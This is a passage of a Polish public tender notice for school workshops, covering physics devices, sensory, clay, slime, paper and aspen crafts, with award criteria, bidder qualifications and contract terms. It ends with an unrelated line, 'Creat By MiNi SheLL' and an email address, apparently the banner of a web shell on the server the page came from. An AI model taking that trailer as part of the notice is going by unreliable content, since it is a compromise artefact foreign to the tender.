oraz na rozwiązywaniu łamigłówek. Warsztaty wpłyną na pobudzenie kreatywnego i innowacyjnego myślenia uczniów. Dzięki warsztatom uczniowie zwiększą zainteresowania przedmiotami ścisłymi: matematyką , przyrodą, fizyką i chemią.Uczestnicy poznają wybrany sprzęt laboratoryjny. Każdy uczestnik będzie miał możliwość wykonania eksperymentu.<br/><br/>c) warsztaty z interaktywnymi urządzeniami z zakresu fizyki „Mobilny park nauki”<br/><br/>1 warsztat 6 h/ dla 150 osób (ucz. Klas I-VIII) do zrealizowania w okresieod 12.11.2025 do 26.06.2027<br/><br/>Warsztat polegający na udostępnieniu i instalacji urządzeń interaktywnych, które poprzez zabawę pokazują działanie podstawowych praw fizyki. W ramach wyposażenia powinny znajdować się m.in. kołyska Newtona, skrzynie zmysłów, koła optyczne, elektryczny labirynt (minimum 20 różnych urządzeń). Dzięki warsztatom, na których uczniowie będą mogli testować działanie zaprezentowanych urządzeń zostaną wprowadzeni w świat odkryć i wynalazków oraz przekonają się że rozwijanie umiejętności pod względem analitycznym, technicznym, kreatywnym wpływa na przyszłe realia zawodowe gdyż technologia odgrywa znaczna rolę w życiu osobistym i zawodowym. <br/><br/>d) Warsztaty sensoryczne „Strefa sensoryczna”<br/><br/>1 warsztat 6 h/ dla 66 osób (ucz. Klas I-V) do zrealizowania w okresieod 12.11.2025 do 26.06.2026<br/><br/>Warsztaty będą polegały na przeprowadzeniu zajęć z wykorzystaniem m.in. specjalistycznych lamp, sensorycznych torów przeszkód, puszek zapachowych. Warsztaty mają na celu usprawnienie koordynacji wzrokowo-ruchowej, stymulowanie zmysłów, ćwiczenia poczucia równowagi, uczenia cierpliwości i wytrwałości. Uczniowie dzięki warsztatom wzmocnią zdolności poznawcze, koordynację ruchową, percepcję wzrokową i słuchową, rozwój kreatywności i wyobraźni oraz koncentrację i uwagę.<br/><br/>e) Warsztaty gliniane<br/><br/>Po 1 warsztacie po 45 minut dla 2 grup po 20 os. kl. 1-8 (łącznie 40os.) w roku 2025/2026 i po 1 warsztacie po 45 minut dla 2 grup po 20 os. kl. 1-8 (łącznie 40os.) w roku 2026/2027, łączna liczba warsztatów do zrealizowania w okresie od 12.11.2025 do 26.06.2027 – 4 warsztaty.<br/><br/>Warsztaty będą polegały na pracy z gliną, wykonaniu wyrobu z gliny, przybliżeniu historii garncarstwa. Dzięki warsztatom uczniowie rozwiną zdolności manualne, planowanie i organizację pracy, poprawią koordynację ruchową. Warsztaty wpłyną na uwrażliwienie uczniów na sztukę oraz rozwój kreatywnego myślenia. Każdy uczestnik będzie miał zapewnioną glinę do pracy min. 0,5 kg, z której wykona pracę rękodzielniczą.<br/><br/>f) Warsztaty slime<br/><br/>Po 1 warsztacie po 45 minut dla 1 grupy 20 os. kl. 1-8 w roku 2025/2026 i <br/>po 1 warsztacie po 45 minut dla 1 grup 20 os. kl. 1-8 w roku 2026/2027, <br/>łączna liczba warsztatów do zrealizowania w okresie od 12.11.2025 do 26.06.2027 – 2 warsztaty.<br/><br/>Warsztaty będą polegały na przeprowadzeniu zajęć z wykorzystaniem super rozciągliwej masy plastycznej. Warsztaty umożliwią wspieranie rozwoju poznawczego, intelektualnego, ruchowego i emocjonalno - społecznego. Dzięki warsztatom uczniowie usprawnią funkcje integracji sensorycznej. Każdy uczestnik będzie miał zapewniony swój slime, niebrudzacy mebli i ubrań z bezpiecznej i nietoksycznej masy w ilości umożliwiającej zabawę.<br/><br/>g) Warsztaty z papierem „Papier papierowi nie równy- co można zrobić z kartki papieru”<br/><br/>Po 1 warsztacie po 45 minut dla 2 grup po 20 os. kl. 1-8 (łącznie 40os.) w roku 2025/2026 i po 1 warsztacie po 45 minut dla 2 grup po 20 os. kl. 1-8 (łącznie 40os.) w roku 2026/2027, łączna liczba warsztatów do zrealizowania w okresie od 12.11.2025 do 26.06.2027 – 4 warsztaty.<br/><br/>Warsztaty będą polegały na przeprowadzeniu zajęć z wykorzystaniem papierowych elementów. Warsztaty wpłyną na pobudzenie wyobraźni, rozwój kreatywności i umiejętność skupienia, a także rozwój motoryki oraz poprawę kompetencji społeczno-emocjonalnych. Każdy uczestnik otrzyma zestaw materiałów papierowych do wytworzenia własnej pracy twórczej.<br/><br/>h) Warsztaty osikowe<br/><br/>Po 1 warsztacie po 45 minut dla 2 grup po 20 os. kl. 1-8 (łącznie 40os.) w roku 2025/2026 i po 1 warsztacie po 45 minut dla 2 grup po 20 os. kl. 1-8 (łącznie 40os.) w roku 2026/2027, łączna liczba warsztatów do zrealizowania w okresie od 12.11.2025 do 26.06.2027 – 4 warsztaty.<br/><br/>Warsztaty będą polegały na wykonywaniu ozdób z naturalnych materiałów – wiórek osikowych. Dzięki warsztatom uczniowie poznają się z tradycję rękodzielniczą, nowe techniki artystycznego wyrazu, zagadnienia z ekologii, rozwiną kreatywne myślenie i zdolności manualne. Każdy uczestnik otrzyma zestaw materiału – wiórek osikowych do wykonania własnej ozdoby. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162200-7 - Pomoce i artykuły szkoleniowe</p> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-06-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1	Zamawiający dokona oceny ofert, w zakresie części 1-2, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/>Lp. Nazwa kryterium Znaczenie kryterium (w %)<br/>1 Cena (Pc) 97<br/>2 Kryterium społeczne (Ps) 3<br/>Razem: 100<br/><br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.<br/><br/><br/>17.2	Punkty za kryterium Cena (Pc) zostaną obliczone według wzoru:<br/><br/>Pc = (Cn / Cb) x 97<br/><br/> gdzie:<br/>Pc- ilość punktów za kryterium cena,<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>Cb – cena oferty badanej.<br/><br/>W kryterium Cena (Pc), oferta z najniższą ceną otrzyma 97 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>17.3	Punkty za kryterium Kryterium społeczne (Ps)<br/>Nazwa: oddelegowanie do realizacji zamówienia osoby niepełnosprawnej.<br/>Cel środowiskowy: Aktywizacja zawodowa osób z grup społecznie marginalizowanych.<br/>Opis: Wykonawca uzyska dodatkowe punkty, jeśli zatrudni lub oddeleguje osobę z niepełnosprawnością (minimum jedną) do realizacji przedmiotowego zamówienia na podstawie umowy o pracę.<br/>Zasady przyznawania punktów:<br/>a) jeżeli Wykonawca zobowiąże się, że zatrudni lub oddeleguje do wykonywania zamówienia osobę z niepełnosprawnością w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (t. j. Dz. U. z 2024 r., poz. 44) do realizacji przedmiotowego zamówienia na podstawie umowy o pracę otrzyma 3 pkt.<br/>b) jeżeli Wykonawca nie zobowiąże się, że zatrudni lub oddeleguje do wykonywania zamówienia osobę z niepełnosprawnością w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społeczne zatrudnianiu osób niepełnosprawnych (t. j. Dz. U. z 2024 r., poz. 44) do realizacji przedmiotowego zamówienia na podstawie umowy o pracę otrzyma 0 pkt.<br/><br/>17.4	Jako najkorzystniejszą ofertę w danej części zamówienia Zamawiający wybierze ofertę, spośród ofert nie podlegających odrzuceniu, która uzyska największą liczbę punktów (P), obliczoną wg następującego wzoru: P = Pc +Ps<br/>gdzie:<br/>P - ocena końcowa ocenionej (badanej) oferty,<br/>Pc - ilość punktów uzyskanych przez ocenianą ofertę w kryterium Cena (Pc).<br/>Ps - ilość punktów uzyskanych przez ocenianą ofertę w kryterium społecznym (Ps).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">97</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">17.3 Punkty za kryterium Kryterium społeczne (Ps) Nazwa: oddelegowanie do realizacji zamówienia osoby niepełnosprawnej. Cel środowiskowy: Aktywizacja zawodowa osób z grup społecznie marginalizowanych. Opis: Wykonawca uzyska dodatkowe punkty, jeśli zatrudni lub oddeleguje osobę z niepełnosprawnością (minimum jedną) do realizacji przedmiotowego zamówienia na podstawie umowy o pracę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>6.1.4	zdolności technicznej lub zawodowej w zakresie:<br/>6.1.1 O udzielenie zamówienia mogą ubiegać się wykonawcy , którzy spełniają następujące warunki dotyczące zdolności technicznej lub zawodowej:<br/>Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował kadrą, która będzie pełniła funkcję instruktora prowadzącego zajęcia/warsztaty oraz spełniała następujące wymogi:<br/>W zakresie części 1: Zajęcia z arytmetyki mentalnej:<br/>a) wykształcenie<br/>- posiada wykształcenie w danej dziedzinie potwierdzone odpowiednim certyfikatem.<br/>Opis dokonania oceny spienienia tego warunku: Wykonawca jest zobowiązany przedłożyć Zamawiającemu na wezwanie potwierdzenie posiadanego wykształcenia – certyfikaty – poświadczone za zgodność z oryginałem.<br/>b) doświadczenie<br/>- udokumentowane doświadczenie instruktora prowadzącego zajęcia w okresie ostatnich 5 lat przed terminem złożenia oferty, co najmniej 1 roku w prowadzeniu zajęć o wskazanej tematyce.<br/>Opis sposobu dokonania oceny spełnienia tego warunku: Wykonawca zobowiązany jest przedłożyć Zamawiającemu na wezwanie wypełniony załącznik nr 2, kryterium powinno zostać potwierdzone właściwymi dokumentami (m.in. świadectwa pracy, umowy, zaświadczenia, referencje, protokoły odbioru)- poświadczone za zgodność z oryginałem.<br/><br/>W zakresie części 2: warsztaty<br/>a) doświadczenie<br/>- udokumentowane doświadczenie instruktora prowadzącego warsztaty w okresie ostatnich 5 lat przed terminem złożenia oferty, co najmniej 1 roku w prowadzeniu zajęć o wskazanej tematyce.<br/>Opis sposobu dokonania oceny spełnienia tego warunku: Wykonawca zobowiązany jest przedłożyć Zamawiającemu na wezwanie wypełniony załącznik nr 2, kryterium powinno zostać potwierdzone właściwymi dokumentami ( m.in.: certyfikat, świadectwa pracy, umowy, zaświadczenia, referencje, protokoły odbioru) - poświadczone za zgodność z oryginałem.<br/>Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych w tym zakresie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.2.	Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>8.2.1.	W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>1)	Wykazu osób<br/>Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawień i wykształcenie niezbędnych do wykonywania zamówienia (dotyczy części 1) oraz doświadczenia (dotyczy części 1, 2)</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>10.2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	Oświadczenie, o którym mowa w pkt. 8.1 SWZ składa z ofertą każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianiu warunków udziału. <br/>10.3.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy <br/>w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 21.2	Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art. 454-455 ustawy Pzp oraz postanowień Projektu Umowy.<br/><br/>1.	Zamawiający zmieni postanowienia niniejszej umowy w następujących okolicznościach: <br/>1) nastąpi zmiana powszechnie obowiązujących przepisów w stosunku do obowiązujących na chwilę podpisania niniejszej umowy, przy czym zmiana ta musi wywierać bezpośredni wpływ na realizację przedmiotu umowy i może prowadzić do modyfikacji wyłącznie tych zapisów umowy, do których się odnosi, <br/>2)	gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest przedmiotowe zamówienie, <br/>3) gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Fundusze Europejskie dla Lubelskiego 2021-2027,<br/>4) gdy wynikną rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie i załącznikach, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy i załączników <br/>w celu jednoznacznej interpretacji zapisów umowy przez Strony. <br/>2.	Zamawiający przewiduje możliwość zmiany instruktora, w przypadku gdy z przyczyn niezależnych od Wykonawcy udział osoby wskazanej w Wykazie osób, stanowiącego Załącznik nr 3 Umowy (odpowiednio załącznik nr 6 do SWZ) nie będzie możliwy <br/>w danych zajęciach. W takim przypadku Wykonawca musi udokumentować Zamawiającemu, że nowa osoba posiada doświadczenie i kwalifikacje tożsame lub wyższe od osoby posiadającej najniższe doświadczenie i kwalifikacje wskazanej pierwotnie w Wykazie osób. <br/>4. Zmiana osoby, o której mowa w ust. 3 wymaga pisemnego oświadczenia Wykonawcy wraz z uzasadnieniem i nie powoduje zmiany Umowy. Zmiana wymaga pisemnej akceptacji Zamawiającego przez Dyrektora Szkoły lub Wicedyrektora Szkoły<br/>5. Zmiany niniejszej Umowy wymagają formy pisemnej w postaci aneksu pod rygorem nieważności, z wyłączeniem zmian o których w ust. 3. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">14.1. Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem wskazanym w pkt. 1.2 SWZ</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-21 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 7.6.	Wykonawca podlega wykluczeniu także w oparciu o podstawy wykluczenia wskazane art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t. j. Dz. U. 2024 r., poz. 507).

Creat By MiNi SheLL
Email: jattceo@gmail.com